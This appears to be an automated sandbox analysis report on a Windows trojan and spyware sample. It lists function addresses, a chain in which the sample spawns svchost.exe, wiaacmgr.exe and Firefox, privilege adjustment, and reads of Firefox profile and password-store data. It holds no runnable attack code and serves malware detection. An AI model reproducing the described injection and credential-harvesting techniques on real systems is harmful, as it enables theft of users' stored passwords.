Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D0A9A6	2_2_03D0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C56962	2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E8F0	2_2_03C6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C268B8	2_2_03C268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4A840	2_2_03C4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C42840	2_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C32FC8	2_2_03C32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4CFE0	2_2_03C4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBEFA0	2_2_03CBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB4F40	2_2_03CB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C82F28	2_2_03C82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C60F30	2_2_03C60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE2F30	2_2_03CE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFEEDB	2_2_03CFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C52E90	2_2_03C52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFCE93	2_2_03CFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40E59	2_2_03C40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFEE26	2_2_03CFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3ADE0	2_2_03C3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C58DBF	2_2_03C58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4AD00	2_2_03C4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDCD1F	2_2_03CDCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30CF2	2_2_03C30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0CB5	2_2_03CE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40C00	2_2_03C40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C8739A	2_2_03C8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2D34C	2_2_03C2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF132D	2_2_03CF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5B2C0	2_2_03C5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED	2_2_03CE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C452A0	2_2_03C452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4B1B0	2_2_03C4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C7516C	2_2_03C7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2F172	2_2_03C2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D0B16B	2_2_03D0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEF0CC	2_2_03CEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C470C0	2_2_03C470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF70E9	2_2_03CF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFF0E0	2_2_03CFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFF7B0	2_2_03CFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF16CC	2_2_03CF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C85630	2_2_03C85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D095C3	2_2_03D095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDD5B0	2_2_03CDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF7571	2_2_03CF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C31460	2_2_03C31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFF43F	2_2_03CFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB5BF0	2_2_03CB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C7DBF9	2_2_03C7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5FB80	2_2_03C5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFFB76	2_2_03CFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEDAC6	2_2_03CEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDDAAC	2_2_03CDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C85AA0	2_2_03C85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE1AA3	2_2_03CE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFFA49	2_2_03CFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF7A46	2_2_03CF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB3A6C	2_2_03CB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C49950	2_2_03C49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5B950	2_2_03C5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD5910	2_2_03CD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C438E0	2_2_03C438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAD800	2_2_03CAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C03FD2	2_2_03C03FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C03FD5	2_2_03C03FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C41F92	2_2_03C41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFFFB1	2_2_03CFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFFF09	2_2_03CFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C49EB0	2_2_03C49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5FDC0	2_2_03C5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C43D40	2_2_03C43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF1D5A	2_2_03CF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF7D73	2_2_03CF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFFCF2	2_2_03CFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB9C32	2_2_03CB9C32
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_05929500	3_2_05929500
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_05929509	3_2_05929509
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_05931CD9	3_2_05931CD9
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_05948429	3_2_05948429
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_05927729	3_2_05927729
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_05929729	3_2_05929729
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_0592FEC6	3_2_0592FEC6
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_0592FEC9	3_2_0592FEC9
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_0591D66B	3_2_0591D66B
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_05927879	3_2_05927879
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_0592786E	3_2_0592786E
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05340535	5_2_05340535
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05400591	5_2_05400591
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053E4420	5_2_053E4420
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053F2446	5_2_053F2446
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053EE4F6	5_2_053EE4F6
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05340770	5_2_05340770
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05364750	5_2_05364750
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0533C7C0	5_2_0533C7C0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0535C6E0	5_2_0535C6E0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053DA118	5_2_053DA118
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05330100	5_2_05330100
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053C8158	5_2_053C8158
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053F41A2	5_2_053F41A2
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_054001AA	5_2_054001AA
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053F81CC	5_2_053F81CC
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053D2000	5_2_053D2000
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FA352	5_2_053FA352
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_054003E6	5_2_054003E6
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0534E3F0	5_2_0534E3F0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053E0274	5_2_053E0274
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053C02C0	5_2_053C02C0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053DCD1F	5_2_053DCD1F
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0534AD00	5_2_0534AD00
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05358DBF	5_2_05358DBF
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0533ADE0	5_2_0533ADE0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05340C00	5_2_05340C00
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053E0CB5	5_2_053E0CB5
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05330CF2	5_2_05330CF2
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05360F30	5_2_05360F30
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053E2F30	5_2_053E2F30
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05382F28	5_2_05382F28
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053B4F40	5_2_053B4F40
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053BEFA0	5_2_053BEFA0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0534CFE0	5_2_0534CFE0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05332FC8	5_2_05332FC8
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FEE26	5_2_053FEE26
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05340E59	5_2_05340E59
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05352E90	5_2_05352E90
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FCE93	5_2_053FCE93
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FEEDB	5_2_053FEEDB
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05356962	5_2_05356962
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053429A0	5_2_053429A0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0540A9A6	5_2_0540A9A6
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0534A840	5_2_0534A840
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05342840	5_2_05342840
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053268B8	5_2_053268B8
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0536E8F0	5_2_0536E8F0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FAB40	5_2_053FAB40
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053F6BD7	5_2_053F6BD7
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0533EA80	5_2_0533EA80
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053F7571	5_2_053F7571
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_054095C3	5_2_054095C3
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053DD5B0	5_2_053DD5B0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FF43F	5_2_053FF43F
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05331460	5_2_05331460
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FF7B0	5_2_053FF7B0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05385630	5_2_05385630
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053F16CC	5_2_053F16CC
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0540B16B	5_2_0540B16B
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0532F172	5_2_0532F172
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0537516C	5_2_0537516C
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0534B1B0	5_2_0534B1B0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053F70E9	5_2_053F70E9
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FF0E0	5_2_053FF0E0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053EF0CC	5_2_053EF0CC
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053470C0	5_2_053470C0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053F132D	5_2_053F132D
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0532D34C	5_2_0532D34C
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0538739A	5_2_0538739A
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053452A0	5_2_053452A0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053E12ED	5_2_053E12ED
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0535B2C0	5_2_0535B2C0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053F7D73	5_2_053F7D73
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053F1D5A	5_2_053F1D5A
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05343D40	5_2_05343D40
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0535FDC0	5_2_0535FDC0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053B9C32	5_2_053B9C32
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FFCF2	5_2_053FFCF2
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FFF09	5_2_053FFF09
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FFFB1	5_2_053FFFB1
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05341F92	5_2_05341F92
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05349EB0	5_2_05349EB0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053D5910	5_2_053D5910
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05349950	5_2_05349950
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0535B950	5_2_0535B950
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053AD800	5_2_053AD800
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053438E0	5_2_053438E0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FFB76	5_2_053FFB76
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0535FB80	5_2_0535FB80
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053B5BF0	5_2_053B5BF0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0537DBF9	5_2_0537DBF9
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053B3A6C	5_2_053B3A6C
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053FFA49	5_2_053FFA49
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053F7A46	5_2_053F7A46
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053DDAAC	5_2_053DDAAC
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05385AA0	5_2_05385AA0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053E1AA3	5_2_053E1AA3
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053EDAC6	5_2_053EDAC6
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_032720E0	5_2_032720E0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0326CFB7	5_2_0326CFB7
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0326CFC0	5_2_0326CFC0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0326B325	5_2_0326B325
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0326B330	5_2_0326B330
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_03261122	5_2_03261122
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0326B1E0	5_2_0326B1E0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0326D1E0	5_2_0326D1E0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_03275790	5_2_03275790
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0327397D	5_2_0327397D
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_03273980	5_2_03273980
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0328BEE0	5_2_0328BEE0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0515E76C	5_2_0515E76C
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0515E3D5	5_2_0515E3D5
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0515E2B5	5_2_0515E2B5
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0515D838	5_2_0515D838
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0515CAD8	5_2_0515CAD8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C87E54 appears 110 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03CBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03CAEA12 appears 86 times
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: String function: 00B17DE1 appears 36 times
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: String function: 00B38900 appears 42 times
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: String function: 00B30AE3 appears 70 times
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: String function: 05387E54 appears 110 times
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: String function: 053BF290 appears 105 times
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: String function: 05375130 appears 58 times
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: String function: 0532B970 appears 280 times
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: String function: 053AEA12 appears 86 times

Source: AuKUol8SPU.exe, 00000000.00000003.1371121872.00000000042D3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AuKUol8SPU.exe
Source: AuKUol8SPU.exe, 00000000.00000003.1367862783.000000000447D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AuKUol8SPU.exe

Source: AuKUol8SPU.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@8/7

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B7A06A GetLastError,FormatMessageW,

0_2_00B7A06A

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B681CB AdjustTokenPrivileges,CloseHandle,		0_2_00B681CB
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00B687E1

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B7B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00B7B3FB

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B8EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00B8EE0D

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B883BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00B883BB

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B14E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00B14E89

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

File created: C:\Users\user\AppData\Local\Temp\autA4C4.tmp

Jump to behavior

Source: AuKUol8SPU.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wiaacmgr.exe, 00000005.00000003.1769838365.000000000352F000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2595170542.0000000003553000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1767532093.0000000003523000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2595170542.0000000003523000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: AuKUol8SPU.exe	Virustotal: Detection: 66%
Source: AuKUol8SPU.exe	ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Users\user\Desktop\AuKUol8SPU.exe "C:\Users\user\Desktop\AuKUol8SPU.exe"
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AuKUol8SPU.exe"
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Process created: C:\Windows\SysWOW64\wiaacmgr.exe "C:\Windows\SysWOW64\wiaacmgr.exe"
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AuKUol8SPU.exe"	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Process created: C:\Windows\SysWOW64\wiaacmgr.exe "C:\Windows\SysWOW64\wiaacmgr.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: scansetting.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: iertutil.dll	Jump to behavior
